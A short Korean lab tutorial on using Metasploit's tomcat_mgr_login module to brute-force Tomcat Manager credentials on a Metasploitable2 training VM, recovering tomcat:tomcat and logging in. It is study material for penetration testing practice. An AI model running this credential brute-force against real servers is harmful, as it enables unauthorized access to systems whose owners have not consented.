이번엔 Metaspolit으로 Tomcat 취약점을 진단해 보겠다
Metasploitable2 에 8180PORT로 접속하면 Tomcat 서버를 볼 수 있다
이제 Metasploit을 이용하여 Tomcat 관리자 id와 password를 알아내보자
msfconsole
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login (톰캣서버에 id와 password 브루트포스)
show options 하면 많은 옵션이 나오는데 여기서
rhosts 와 rport 만 넣어 주면 된다
set RHOSTS 192.168.17.10 (metasploitable2)
set RPORT ( metasploitable2 의 tomcat port 8180 )
exploit
[*] 들중에 사이에 [+] 가 보인다 LOGIN SUCCESSFUL: tomcat:tomcat
id는 tomcat이고 password도 tomcat 이라는 걸 찾아냈다
그럼 다시 Tomcat 사이트에 접속해서 왼쪽 Administration에 Tomcat Manager를 눌러 보자
그럼 아이디와 패스워드를 물어보는데
Metasploit으로 찾아낸 tomcat:tomcat을 넣어준다
성공적으로 로그인 한것을 볼수 있다